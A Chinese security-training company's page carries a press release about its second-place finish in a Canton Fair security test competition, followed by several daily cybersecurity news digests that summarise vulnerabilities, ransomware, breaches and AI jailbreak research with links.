近日，在备受瞩目的第 136 届广交会网络平台测试赛中，蚁景科技凭借卓越表现与精湛技术脱颖而出。此次比赛由中国网络空间安全教育论坛（简称 “网教盟”）主办，蚁景科技团队斩获团体积分 132 分，再度荣膺第二名的佳绩，续写荣誉篇章。 这已经是蚁景科技连续三届在广交会测试赛中稳坐亚军宝座，实力不容小觑。此次测试赛竞争激烈，蚁景科技精英讲师带领多名学员在比赛中大显身手，尽显超凡的网安技术功底与深厚专业素养。其中，蚁景科技的一叶讲师协同 2 名学员表现尤为亮眼，分别以第 4 名、第 5 名和第 7 名的傲人成绩，强势闯入本次测试赛个人排行榜前十，再度为公司争得荣光，有力印证了蚁景科技在网络安全人才培养领域的领先地位以及深厚人才储备优势。 此次再获突破性成果，一方面展现出蚁景科技在网络安全领域的专业硬实力，另一方面凸显其坚定不移地持续深耕人才培养、加大技术研发投入的决心。借助参与此类高规格竞赛实战契机，蚁景科技在磨砺学员技术、提升实战水平的同时，也为网络安全领域蓬勃发展注入源源不断的动力，持续书写属于自己的荣耀篇章。 关于蚁景科技 湖南蚁景科技有限公司，作为专业的“网络安全人才培养服务提供商”，致力于配合国家网络安全人才培养战略，精准对接行业人才市场的需求。公司秉承提升网络安全实战能力为核心的培养目标，紧密结合用人单位在网络安全岗位上的技能要求，提供前沿、系统且专业的网络安全实战技能培训。同时也针对政企单位、科研院所等行业客户，量身定制网络安全培训方案，以满足其特定的培训需求。 此外，蚁景科技紧密结合高校网络安全人才培养体系，基于对“互联网+教育”的精准把握，依托自主研发的网络安全人才实训平台——蚁景网安实验室，高效构建多样化的网络安全实验场景，全面满足高校教师的在线实验教学需求，同时也为网络安全爱好者提供了优质的在线实操学习环境。

1、谷歌确认并修复Chrome中的一个严重安全漏洞 https://cybersecuritynews.com/chrome-vulnerability-allows-arbitrary-code/ 谷歌已经确认Chrome中存在一个严重的安全漏洞，该漏洞可能允许攻击者通过特制的网页执行任意代码，影响Windows、Mac、Linux和Android平台上的数十亿用户。谷歌发布了紧急更新版本，以修复该漏洞。该漏洞被标识为CVE-2025-2476，被归类为Chrome Lens组件中的释放后重用（UAF）漏洞，成功利用此漏洞可能允许攻击者以与登录用户相同的权限执行任意代码。目前尚未确认该漏洞被恶意利用，谷歌发布了安全更新以修复该漏洞，用户应立 2、乌克兰国家铁路运营商Ukrzaliznytsia遭受网络攻击 https://www.bleepingcomputer.com/news/security/cyberattack-takes-down-ukrainian-state-railways-online-services/ 乌克兰国家铁路运营商Ukrzaliznytsia遭受一次大规模的网络攻击，这导致通过移动应用程序和网站购买车票的在线服务中断。Ukrzaliznytsia在多个通信渠道的官方声明中证实了此次事件，并对造成的不便表示歉意。尽管在线售票平台出现问题，但Ukrzaliznytsia在其公告中指出，旅行运营方面并未受到网络攻击的影响。该运营商在最新发出的声明中表示，列车运行保持稳 3、新型钓鱼攻击瞄准macOS用户，伪造安全警报 https://www.freebuf.com/news/425599.html LayerX Labs 最近发布的一份报告揭示了一场新的钓鱼攻击活动，该活动最初旨在欺骗 Windows 用户，但最近将目标转向了 macOS 用户。LayerX Labs 对该活动进行了数月的监控，发现攻击者最初伪装成微软安全警报，试图窃取用户凭证。 4、新型钓鱼诈骗：假冒Instagram聊天机器人窃取账户 https://hackread.com/phishing-scam-fake-instagram-chatbots-hijack-accounts/ 近日，一种新型钓鱼攻击活动正在诱骗用户交出他们的Meta商务账户（尤其是Instagram账户）的访问权限。Cofense钓鱼防御中心检测到，该诈骗活动通过假冒的聊天支持、详细的操作说明，并试图将自己添加为安全登录方式，从而劫持商务账户。 5、新型VanHelsing勒索软件瞄准Windows、ARM和ESXi系统 https://www.freebuf.com/articles/system/425606.html 一种名为VanHelsing的新型多平台勒索软件即服务（RaaS）操作已经出现，其目标包括Windows、Linux、BSD、ARM和ESXi系统。VanHelsing于3月7日首次在地下网络犯罪平台上推广，为有经验的合作伙伴提供免费加入的机会，而经验不足的威胁行为者则需要缴纳5000美元的保证金。 6、新型Linux内核Rust模块发布，专为检测Rootkit而生 https://www.freebuf.com/articles/system/425586.html 在对抗复杂Linux恶意软件的持续斗争中，一款突破性的安全工具应运而生。近日，一款基于Rust语言开发的内核模块正式发布，专门用于检测Rootkit，为识别这些极其隐蔽的威胁提供了更强大的能力。 7、2 月勒索软件攻击暴增 50%，Cl0p 成最大安全隐患 https://www.anquanke.com/post/id/305365 根据NCC Group的一份报告，与前一个月相比，2 月份勒索软件攻击数量激增 50%，达到了前所未有的 886 起。该报告显示，与 2024 年 2 月记录的 403 起攻击相比，勒索软件事件数量增长了 119%。研究的关键发现指出，网络犯罪团伙 Cl0p 最为活跃，实施了其中 37% 的攻击。 8、非法抓取使用数十亿张人脸照片，Clearview AI赔偿23%股权 https://www.secrss.com/articles/76972 美国芝加哥一名联邦法官近日批准了一项具有创新性的全国性集体诉讼和解协议。该协议旨在解决针对人脸识别公司Clearview AI的隐私诉讼，但不会立即向受害者支付任何具体金额的赔偿。 9、Intel Security Fusese加密密钥泄漏 https://swarm.ptsecurity.com/last-barrier-destroyed-or-compromise-of-fuse-encryption-key-for-intel-security-fuses/ Intel CSME（企业安全管理引擎）可以说是当前最复杂的带外平台之一，然而厂商对此并未提供足够的透明度。 10、K8s Ingress NGINX 控制器曝高危漏洞，无需认证即可远程执行代码 https://www.freebuf.com/vuls/425603.html Kubernetes 的 Ingress NGINX Controller 中披露了五个严重的安全漏洞，可能导致未经认证的远程代码执行（RCE）。这些漏洞使得超过 6,500 个集群面临直接风险，因为它们将组件暴露在公共互联网上。这些漏洞（CVE-2025-24513、CVE-2025-24514、CVE-2025-1097、CVE-2025-1098 和 CVE-2025-1974）的 CVSS 评分为 9.8，被云安全公司 Wiz 统称为 IngressNightmare。值得注意的是，这些漏洞并不影响 N 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、研究人员发现Albabat勒索软件新变种 https://www.trendmicro.com/en_ph/research/25/c/albabat-ransomware-group.html 研究人员发现了Albabat勒索软件的新变种，这些新变种表明该勒索组织可能将目标从Windows系统扩展到Linux和macOS系统。新变种通过GitHub REST API检索其配置数据，配置数据提供了有关勒索软件行为和操作参数的详细信息。Albabat勒索软件在加密文件时会跳过特定的文件和文件夹，终止指定的目标进程。此外，该勒索软件会从受感染计算机中窃取信息，其中包括系统详细信息、用户信息、地理位置数据、加密状态以及有关赎金支付的详细信 2、攻击者利用Checkpoint驱动程序进行BYOVD攻击 https://venaksecurity.com/2025/03/20/cybercriminals-exploit-checkpoints-driver-in-a-byovd-attack/ 研究人员最近发现一个复杂的网络攻击，攻击者利用Checkpoint的ZoneAlarm反病毒软件的内核级驱动程序vsdatant.sys进行攻击。vsdatant.sys中存在的缺陷允许攻击者提升权限并绕过关键的Windows安全功能（例如内存完整性），并从受感染的系统中提取敏感数据。此外，攻击者还建立了到受感染系统的远程桌面协议（RDP）连接，从而能够保持对受感染机器的持久访问。 3、Kemp LoadMaster修复一个缓冲区溢出漏洞 https://securityonline.info/cve-2025-1758-critical-buffer-overflow-in-kemp-loadmaster-opens-door-to-remote-code-execution/ 研究人员在Progress Software的Kemp LoadMaster中发现了一个安全漏洞，该漏洞被标识为CVE-2025-1758（CVSS评分为9.8），是一个基于堆栈的缓冲区溢出漏洞。该问题存在于mangle可执行文件中，该文件是LoadMaster中负责处理数据输入操作的组件。此漏洞影响7.2.61.1之前的多个LoadMaster版本 4、Next.js 严重漏洞：攻击者可绕过中间件授权检查 https://www.freebuf.com/vuls/425556.html Next.js React 框架近日披露了一个严重的安全漏洞，攻击者可在特定条件下利用该漏洞绕过授权检查。该漏洞被标记为 CVE-2025-29927，其 CVSS 评分为 9.1（满分 10.0）。Next.js 在公告中表示：“Next.js 使用内部标头 x-middleware-subrequest 来防止递归请求触发无限循环。然而，攻击者可能通过跳过中间件的执行，使请求在到达路由之前绕过关键检查，例如授权 Cookie 验证。”该漏洞已在版本 12.3.5、13.5.9、14.2.25 和 15.2. 5、黑客声称窃取600万条记录，甲骨文否认数据泄露 https://www.freebuf.com/articles/database/425459.html CloudSEK的XVigil平台近期调查发现，一起针对甲骨文云（Oracle Cloud）的网络攻击导致600万条记录被窃取，可能影响超过14万名租户。据报道，一名名为“rose87168”的威胁行为者实施了此次攻击，窃取了包括JKS文件、加密的SSO密码、密钥文件和企业管理器JPS密钥在内的敏感数据，这些数据目前正在Breach Forums和其他暗网论坛上出售。然而，甲骨文发布声明否认其云基础设施遭到入侵。甲骨文在回应报告时表示 ：“甲骨文云并未遭到入侵。公布的凭证并非用于甲骨文 6、Cloudflare全面禁止未加密流量访问其API端点 https://www.freebuf.com/articles/web/425480.html Cloudflare宣布已关闭所有HTTP连接，现在仅接受通过HTTPS加密的安全连接访问api.cloudflare.com。这一举措旨在防止未加密的API请求被发送，即使是意外发送，从而消除敏感信息在明文流量中暴露的风险。Cloudflare在周四的公告中表示：“从今天起，任何未加密的api.cloudflare.com连接都将被完全拒绝。”该公司进一步解释道：“开发者不应再期望HTTP连接会收到403 Forbidden响应，因为我们将通过完全关闭HTTP接口来阻止底层连接的建立。只有安全 7、微软可信签名服务遭滥用，恶意软件借机获得合法签名 https://www.freebuf.com/news/425460.html 网络犯罪分子正在滥用微软可信签名平台，通过有效期仅三天的短期证书为恶意软件可执行程序进行代码签名。长期以来，威胁行为者一直觊觎代码签名证书，因为这类证书可用于为恶意软件披上合法企业的外衣。 8、零日漏洞经纪公司Operation Zero悬赏400万美元收购Telegram漏洞 https://www.freebuf.com/vuls/425445.html 俄罗斯零日漏洞经纪公司Operation Zero正在寻找流行通讯应用Telegram的漏洞，并为此悬赏高达400万美元。俄罗斯零日漏洞经纪公司Operation Zero正在悬赏高达400万美元收购Telegram的漏洞，这一消息最初由Tech Crunch报道。该公司为一键远程代码执行（RCE）漏洞提供高达50万美元的赏金，为零点击RCE漏洞提供50万美元，而为能够完全控制设备的全链漏洞提供高达400万美元的赏金。 9、安卓设备被Root后遭遇攻击的风险激增3000倍 https://www.zimperium.com/blog/catch-me-if-you-can-rooting-tools-vs-the-mobile-security-industry/ Zimperium的一份报告警告称，被Root或越狱的手机仍然是企业面临的主要风险，其中安卓设备被Root后遭遇攻击的风险激增3000倍，因为这些设备更容易成为恶意软件和系统入侵的目标。 10、CISA发布五份工控系统安全公告，涵盖漏洞与利用 https://cybersecuritynews.com/cisa-releases-five-industrial-control-systems/ 美国网络安全和基础设施安全局（CISA）于2025年3月20日发布了五份工业控制系统（ICS）安全公告，提供了影响多家供应商工控系统的安全漏洞的关键信息。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、研究人员发现恶意的VSCode扩展 https://www.bleepingcomputer.com/news/security/vscode-extensions-found-downloading-early-stage-ransomware/ 研究人员发现两款恶意的VSCode扩展，分别是“ahban.shiba”和“ahban.cychelloworld”。这两款扩展分别于2024年10月27日、2025年2月17日上传到VSCode平台，绕过了安全审查并存在了很长时间。研究人员发现这两款扩展包含PowerShell命令，该命令会从托管在Amazon AWS的远程服务器中下载并植入勒索软件，该勒索软件目前仅加密特定文件 2、Veeam修复其软件中的远程代码执行漏洞 https://www.bleepingcomputer.com/news/security/veeam-rce-bug-lets-domain-users-hack-backup-servers-patch-now/ Veeam已修复其Backup&Replication软件中一个被标识为CVE-2025-23120的远程代码执行漏洞，该公司已在发布的12.3.1版本（build 12.3.1.1139）中修复了该漏洞。该问题源于类中的反序列化漏洞，反序列化漏洞是指应用程序不正确地处理序列化数据，从而允许攻击者注入恶意对象并执行恶意代码。虽然目前还没有关于该漏洞被恶意利用的报告，但研究人员 3、收藏品交易平台Collectibles暴露近90万客户信息 https://cybernews.com/security/collectibles-marketplace-data-leak-trading-cards/ 收藏品交易平台Collectibles.com暴露近90万客户的敏感信息，涉及客户的卡牌清单、交易记录、全名和其他敏感信息。研究团队发现了一个属于Collectibles.com（也称为Cardbase）的Elasticsearch集群，暴露的数据库中包含近300GB的数据，包括全名、电子邮件地址、个人资料图片链接、其他用户帐户详细信息、收藏卡销售信息、交易数据。该数据库暴露了十多天，虽然没有证据表明攻击者访问了这些数据，但攻击者有 4、攻击者在Reddit传播AMOS和Lumma窃密木马 https://www.malwarebytes.com/blog/scams/2025/03/amos-and-lumma-stealers-actively-spread-to-reddit-users 研究人员称有攻击者通过Reddit帖子传播针对Mac和Windows系统的窃密木马，其目标是加密货币交易的用户。其中一种常见的诱饵文件是伪装成流行交易平台TradingView的虚假程序。攻击者发布虚假安装程序的链接，这些安装程序中被植入了Lumma Stealer或Atomic Stealer（AMOS）这两种窃密木马。 5、IBM修复AIX中的两个远程代码执行漏洞 https://securityonline.info/ibm-aix-security-breach-cve-2024-56346-cvss-10-cve-2024-56347-explained IBM发布了一份安全公告，详细介绍了AIX中的安全漏洞，这些漏洞可能允许远程攻击者执行任意命令，这两个漏洞分别是CVE-2024-56346（CVSS评分为10）和CVE-2024-56347（CVSS评分为9.6）。CVE-2024-56346存在于IBM AIX nimesis NIM主服务中，CVE-2024-56347 影响IBM AIX nimsh服务。由于不正确的进程控制，这两个漏洞 6、WordPress安全插件WP Ghost中存在远程代码执行漏洞 https://www.bleepingcomputer.com/news/security/wordpress-security-plugin-wp-ghost-vulnerable-to-remote-code-execution-bug/ 流行的WordPress安全插件WP Ghost中存在一个安全漏洞，该漏洞可能允许未经身份验证的攻击者远程执行代码并劫持服务器。该漏洞被标识为CVE-2025-26909（CVSS 评分9.6），影响WP Ghost 5.4.01及更早版本。该漏洞源于"showFile()"函数中输入验证不足，利用该漏洞可能允许攻击者完全接管网站。WP Ghost开 7、流行Java框架Spring修复两个安全漏洞 https://securityonline.info/spring-security-updates-address-authorization-bypass-and-password-length-vulnerabilities/ Spring是一个广泛用于基于Java应用程序的框架，披露了两个可能导致授权绕过和弱密码强制执行的安全漏洞。这两个漏洞分别是CVE-2025-22223和CVE-2025-22228，影响Spring Security的多个版本。Spring建议开发人员升级到已修复的版本，以降低被攻击的风险。 8、Keenetic证实用户数据遭到泄露 https://cybernews.com/security/keenetic-router-data-leak-puts-users-at-risk/ Keenetic路由器用户遭遇数据泄露事件，敏感凭据、设备详情、网络配置和日志等信息遭到泄露。研究人员收到了匿名电子邮件所发送的泄露数据样本。研究人员证实，泄露内容包括从WiFi密码和路由器配置到详细服务日志的所有内容。Keenetic估计此次事件产生的风险较低，可被访问的数据库字段数量有限，并且该公司不收集、存储或分析支付卡详细信息或相关凭据、交易数据、银行详细信息或银行密码，因此此类数据不受影响。 9、Coinbase成为近期GitHub Actions供应链攻击的主要目标 https://www.freebuf.com/articles/es/425442.html 研究人员发现，Coinbase是近期GitHub Actions供应链攻击的主要目标，该攻击导致数百个代码库中的机密信息泄露。 10、六国政府疑似使用以色列Paragon间谍软件窃取即时通讯数据 https://www.freebuf.com/news/425217.html 根据加拿大公民实验室（The Citizen Lab）的最新报告，澳大利亚、加拿大、塞浦路斯、丹麦、以色列和新加坡六国政府疑似成为以色列公司Paragon Solutions开发的间谍软件的客户。该间谍软件名为Graphite，能够从设备上的即时通讯应用程序中窃取敏感数据。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、研究人员发现一种名为Arcane的新型窃密木马 https://securelist.com/arcane-stealer/115919/ 研究人员发现，攻击者正在使用一种名为Arcane的新型窃密木马窃取广泛的用户数据，包括VPN账号凭据、游戏客户端、消息应用程序以及存储在网络浏览器中的信息。与Arcane相关的恶意软件活动始于2024年11月，其背后攻击者的所有对话和公开帖子均使用俄语。研究人员观测到的数据显示，大多数Arcane攻击活动发生在俄罗斯、白俄罗斯和哈萨克斯坦。 2、宾夕法尼亚州教育协会证实超过50万人的数据遭到泄露 https://www.bleepingcomputer.com/news/security/pennsylvania-education-union-data-breach-hit-500-000-people/ 宾夕法尼亚州教育协会（PSEA）正在通知超过50万人，攻击者在2024年7月的安全事件中窃取了他们的个人信息。PSEA表示，泄露的信息因人而异，涉及个人、财务和健康数据，包括驾驶执照或州身份证、社会安全号码、账户密码、安全码、支付卡信息、护照信息、纳税人识别号、凭证、健康保险和医疗信息。虽然PSEA没有确认此次攻击的攻击者，但Rhysida勒索组织于2024年9月9日声称对此攻击 3、Qilin勒索组织声称攻击了SMC欧洲公司 https://www.csoonline.com/article/3849350/ransomware-attacke-auf-smc-europa.html 据称，自动化机械设备制造公司SMC遭受了勒索软件攻击。Qilin勒索组织最近在其网站上发布了一个帖子，声称他们已经从SMC的欧洲子公司窃取了大约1TB的数据。攻击者声称窃取的数据包括：执行器、控制阀和支持物联网的工业组件的技术设计图；包含个人身份信息（PII）、工资单数据和绩效文件的员工档案；与整个欧盟的汽车和航空制造商签订的供应链合同。SMC欧洲公司目前尚未对此事件发表官方声明。 4、攻击者声称出售佳能公司内部防火墙的管理员级访问权限 https://cybersecuritynews.com/hackers-allegedly-selling-firewall-access-to-canon/ 攻击者正在黑客论坛上出售对佳能公司内部防火墙系统的管理员级别的访问权限。该攻击者发帖宣称拥有佳能内部网络的特权访问权限，并提供该公司防火墙系统的root/管理员凭据。通过对防火墙基础设施的root访问权限，攻击者可能能够建立持久的后门、在网络中进行横向移动，或者可能发起勒索软件攻击。佳能尚未公开确认此次事件是否属实。 5、Cisco智能许可工具漏洞遭攻击者利用，内置后门账户曝光 https://www.freebuf.com/vuls/425266.html 近期，攻击者开始针对未修复漏洞的Cisco智能许可工具（Cisco Smart Licensing Utility, CSLU）实例发起攻击，该漏洞暴露了一个内置的后门管理员账户。Cisco智能许可工具是一款Windows应用程序，允许管理员在本地环境中管理许可证和关联产品，而无需将其连接到Cisco基于云的Smart Software Manager解决方案。 6、研究人员利用AI越狱技术大量窃取Chrome信息 https://www.freebuf.com/news/425121.html Cato Networks作为一家安全访问服务边缘（SASE）解决方案提供商，近日发布了其《2025年Cato CTRL威胁报告》，揭示了一项重要发现。研究人员称，他们成功设计了一种技术，使毫无编程经验的个人也能够利用现成的生成式AI（GenAI）工具创建恶意软件。该研究的核心是一项名为“沉浸式世界”（Immersive World）的新型大语言模型（LLM）越狱技术，由Cato CTRL威胁情报研究员开发。该技术通过构建一个详细的虚构叙事环境，为包括DeepSeek、Microsoft Copilot和Ope 7、黑客利用PHP严重漏洞部署Quasar RAT和XMRig挖矿软件 https://www.freebuf.com/vuls/425125.html 黑客正在利用PHP中的一个严重安全漏洞来传播加密货币挖矿软件和远程访问木马（RAT），例如Quasar RAT。该漏洞被分配了CVE标识符CVE-2024-4577，涉及PHP在基于Windows的系统上以CGI模式运行时的一个参数注入漏洞，可能导致远程攻击者执行任意代码。 8、Kali Linux 2025.1a 发布：新增工具、年度主题更新 https://www.freebuf.com/sectool/425131.html Kali Linux 发布了2025年的首个版本 2025.1a，本次更新新增了一个工具，并对桌面和主题进行了调整。 9、重大漏洞警示：AMI BMC漏洞可能导致远程认证绕过 https://www.freebuf.com/vuls/425160.html 安全研究人员近期发现，AMI的MegaRAC软件中存在一个严重的漏洞，该漏洞可能被攻击者利用以远程绕过认证。这一漏洞编号为CVE-2024-54085，已影响众多数据中心设备和服务器型号，可能危及全球多家组织的云基础设施安全。 10、Synology 严重漏洞可致攻击者远程执行任意代码 https://www.anquanke.com/post/id/305232 Synology 的DiskStation Manager（简称 DSM）存在一个严重漏洞，远程攻击者无需用户交互即可执行任意代码。这个在 2024 年 PWN2OWN 大会期间披露的漏洞被评定为严重级别，通用漏洞评分系统（CVSS）评分为 9.8，这表明它极有可能被广泛利用。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、研究人员在AMI MegaRAC中发现安全漏洞 https://www.bleepingcomputer.com/news/security/critical-ami-megarac-bug-can-let-attackers-hijack-brick-servers/ 研究人员在MegaRAC基板管理控制器（BMC）软件中发现一个新的安全漏洞，可能允许攻击者劫持并可能使易受攻击的服务器瘫痪。该漏洞被标识为CVE-2024-54085，攻击者能够利用此漏洞远程控制被入侵的服务器，远程部署恶意软件、勒索软件，进行固件篡改，使主板组件瘫痪、服务器遭受物理损坏（过电压/瘫痪），以及无限重启循环。研究人员表示CVE-2024-54085身份验证绕 2、研究人员在Adobe Acrobat Reader中发现三个安全漏洞 https://cybersecuritynews.com/adobe-acrobat-reader-vulnerabilities/ 研究人员在Adobe Acrobat Reader中发现了三个安全漏洞，这些漏洞可能允许攻击者执行任意代码或泄露敏感信息。这三个漏洞分别是CVE-2025-27158（CVSS评分8.8）、CVE-2025-27163（CVSS评分6.5）、CVE-2025-27164（CVSS评分6.5）。CVE-2025-27158是一个高危内存损坏漏洞，可能允许攻击者在受害者的系统上执行任意代码。CVE-2025-27163和CVE-2025-27164是Adobe 3、区块链游戏平台WEMIX证实遭受网络攻击 https://www.bleepingcomputer.com/news/security/blockchain-gaming-platform-wemix-hacked-to-steal-61-million/ 区块链游戏平台WEMIX上个月遭受网络攻击，攻击者窃取了865.486万个WEMIX币，当时价值约为610万美元。WEMIX首席执行官证实该事件发生于2025年2月28日，攻击者在窃取了用于监控NFT平台“NILE”服务的身份验证密钥后，渗透了WEMIX。攻击者花了两个月的时间策划他们的攻击，最终尝试执行15次提款，并成功13次。攻击者很快将窃取的WEMIX币通过加密货币交易所进 4、西班牙皇家学院证实遭受勒索软件攻击 https://www.escudodigital.com/ciberseguridad/rae-confirma-haber-sufrido-ataque-ransomware_62705_102.html 西班牙皇家学院（RAE）证实遭受勒索软件攻击，其信息技术基础设施于2月1日晚间遭受了网络攻击。 Fog勒索组织于3月17日通过其网站称其入侵了RAE，但没有具体说明是如何进行攻击的。该勒索组织声称从该学院窃取1GB的数据，其中包括员工和客户的联系方式、内部公司财务文件以及人力资源文件。 5、mySCADA漏洞或被攻击者掌控工业控制系统 https://thehackernews.com/2025/03/critical-myscada-mypro-flaws-could-let.html 网络安全研究人员披露了影响mySCADA myPRO系统的两个重大漏洞的细节。myPRO是一种广泛应用于工业技术（OT）环境中的监控与数据采集（SCADA）系统，这些漏洞可能使恶意攻击者控制易受攻击的设施。 6、微软将于2025年10月终止对Windows 10的支持，不再提供安全更新 https://cybersecuritynews.com/microsoft-to-end-support-for-windows-10/ 微软将于2025年10月14日终止对Windows 10的支持，不再提供安全更新，数百万用户将面临严重的安全威胁，企业需紧急规划迁移策略。 7、Windows文件管理器漏洞可导致网络欺骗攻击，PoC已发布 https://cybersecuritynews.com/microsoft-windows-file-explorer-vulnerability-let-attackers/ Windows文件管理器漏洞CVE-2025-24071可导致攻击者通过解压文件窃取NTLM哈希，无需用户交互，PoC已发布。 8、GitHub Action 漏洞引发连锁供应链攻击 https://www.bleepingcomputer.com/news/security/github-action-hack-likely-led-to-another-in-cascading-supply-chain-attack/ GitHub Action 漏洞引发连锁供应链攻击，reviewdog/action-setup@v1 被攻破，导致 tj-actions/changed-files 泄露数千个存储库的 CI/CD 机密信息，威胁极大。 9、AI代码编辑器被利用进行隐蔽的供应链攻击 https://securityaffairs.com/175593/hacking/rules-file-backdoor-ai-code-editors-silent-supply-chain-attacks.html 新型“规则文件后门”攻击利用AI代码编辑器注入恶意代码，通过隐藏的Unicode字符绕过审查，操纵AI生成有害代码，构成供应链风险，影响数百万用户。 10、Bybit遭黑：高度复杂的多阶段攻击细节曝光 https://cybersecuritynews.com/bybit-hack-sophisticated-multi-stage-attack/ 加密货币交易所Bybit近期发现其以太坊冷钱包遭到未经授权的活动，导致了一次重大安全漏洞。事件发生在通过Safe{Wallet}进行的ETH多签交易过程中，攻击者介入并篡改了交易，最终从交易所的冷钱包中转走了超过40万枚ETH。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、研究人员发现一种名为StilachiRAT的新型远控木马 https://www.microsoft.com/en-us/security/blog/2025/03/17/stilachirat-analysis-from-system-reconnaissance-to-cryptocurrency-theft/ 研究人员发现了一种名为StilachiRAT的新型远控木马，它具有规避检测、保持持久性以及窃取敏感数据等恶意功能。研究人员对具有远控功能的WWStartupCtrl64.dll模块分析后发现，它会从目标系统中窃取多种信息，包括存储在浏览器中的凭据、数字钱包信息、存储在剪贴板中的数据以及系统信息。研究人员尚未将StilachiRAT归因于 2、Babuk勒索组织声称攻击法国电信运营商Orange https://cybernews.com/security/hackers-threaten-release-of-orange-clients-data/ Babuk勒索组织声称对法国电信运营商Orange进行攻击。该组织表示，他们于3月16日入侵了Orange，声称窃取了4.5TB的详细信息，并列出窃取的数据包括电子邮件地址、客户记录、源代码、内部文档、发票、合同、项目、工单、用户数据、员工数据、消息、信用卡、通话记录以及其他个人身份信息（PII）。 3、医疗保健供应商Ascom遭受网络攻击 https://www.marketwatch.com/story/ascom-ticketing-system-hit-by-cyber-attack-9a9cab1a 医疗保健供应商Ascom遭受网络攻击，其技术票务系统受到此次网络攻击的破坏。Ascom在发现攻击后，立即关闭了其票务系统。Ascom表示其他信息技术系统和客户系统未受影响。Hellcat勒索组织声称入侵了Ascom的IT基础设施。Ascom的IT网络安全团队正在对此事件进行调查。 4、Cloudflare推出后量子加密技术，抵御量子计算机攻击 https://www.freebuf.com/articles/es/424967.html Cloudflare宣布为其Zero Trust平台推出首个端到端量子安全准备阶段，使企业能够保护其公司网络流量，抵御未来的量子计算机威胁。这一举措基于自2017年以来Cloudflare对后量子密码学的研究，旨在应对人们对传统加密方法在量子计算攻击下脆弱性的日益担忧。 5、谷歌以320亿美元收购Wiz，加速AI时代云安全与多云战略 https://www.freebuf.com/articles/network/424966.html 近日，谷歌宣布已签署最终协议，将以320亿美元全现金交易收购网络安全公司Wiz，这项交易需通过相关调整后最终完成。交易完成后，Wiz将并入谷歌云（Google Cloud）。 6、谷歌发布开源版OSV扫描工具，助力漏洞检测 https://www.freebuf.com/vuls/424937.html 谷歌近日正式发布了OSV-Scanner V2.0.0版本，这是其开源漏洞扫描工具的重大升级。该版本于2025年3月17日发布，标志着它在帮助开发者识别和修复软件依赖项中安全漏洞的能力取得了显著进展。V2版本在OSV-SCALIBR的基础上进行了升级，引入了大量新功能，使OSV-Scanner转型为一个全面的漏洞检测和修复平台。自2022年12月首次发布以来，OSV-Scanner已经成为开源安全领域的重要工具，帮助开发者轻松获取与其项目相关的漏洞信息。 7、Linux 内核高危漏洞CVE-2024-36904已公开利用 https://www.freebuf.com/vuls/424945.html 安全研究人员近日公开了一个针对CVE-2024-36904的概念验证（PoC）利用程序。这个高危的“释放后使用”（use-after-free）漏洞存在于Linux内核中，且已潜伏七年之久。该漏洞影响了TCP子系统，攻击者可能利用它以内核权限执行远程代码。 8、GitHub遭大规模钓鱼攻击：虚假“安全警报”利用OAuth应用劫持账户 https://www.bleepingcomputer.com/news/security/fake-security-alert-issues-on-github-use-oauth-app-to-hijack-accounts/ 近日，一场大规模的钓鱼攻击席卷了GitHub平台上近12,000个代码仓库，攻击者通过发布虚假的“安全警报”问题，诱骗开发者授权一个恶意OAuth应用，从而获取对他们账户和代码的完全控制权。 9、GSMA 确认RCS端到端加密，实现跨平台安全消息传递 https://thehackernews.com/2025/03/gsma-confirms-end-to-end-encryption-for.html 全球移动通信系统协会 (GSMA) 正式宣布支持通过富通信服务 (RCS) 协议发送的消息的端到端加密 (E2EE)，为Android和iOS平台之间共享的跨平台消息提供急需的安全保护。 10、上下文合规攻击成功突破多数主流AI模型 https://cybersecuritynews.com/new-context-compliance-attack-jailbreaks-ai-models/ 一种名为上下文合规攻击（Context Compliance Attack，CCA）的新方法，出乎意料地简单，却能够绕过大多数主流AI系统的安全防护。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、研究人员发布用于解密Linux版Akira勒索软件的解密器 https://www.bleepingcomputer.com/news/security/gpu-powered-akira-ransomware-decryptor-released-on-github/ 研究人员发布了一个用于解密Linux版Akira勒索软件的解密器，该解密器利用GPU来检索解密密钥并解密文件。该解密器通过利用Akira勒索软件基于当前时间（以纳秒为单位）作为种子生成加密密钥这一特点，来暴力破解加密密钥。研究人员使用了16个RTX 4090 GPU在大约10小时内暴力破解解密密钥，但是根据需要恢复的加密文件数量，整个过程可能需要几天时间。研究人员在报告中指出，代码还 2、研究人员发现Delphi语言中存在内存损坏漏洞 https://cybersecuritynews.com/critical-vulnerabilities-in-delphi-code/ 研究人员发现Delphi编程语言中存在严重的内存损坏漏洞，这些风险可能导致受影响的软件程序崩溃、数据泄露、甚至远程代码执行。这些漏洞与Delphi处理内存管理有关，尤其是在数组、字符串和对象分配等方面。研究人员的研究表明，即使启用了一些安全机制，Delphi中的编程错误也可能导致可利用的安全漏洞。研究团队构建了多个概念验证示例来演示这些漏洞，重点关注基于堆栈和堆的损坏场景。他们的研究结果表明，虽然调试版本可以通过范围检查捕获一些问题，但使用默认编译器设 3、美国西部联盟银行披露一起数据泄露事件 https://www.claimdepot.com/data-breach/western-alliance-bank 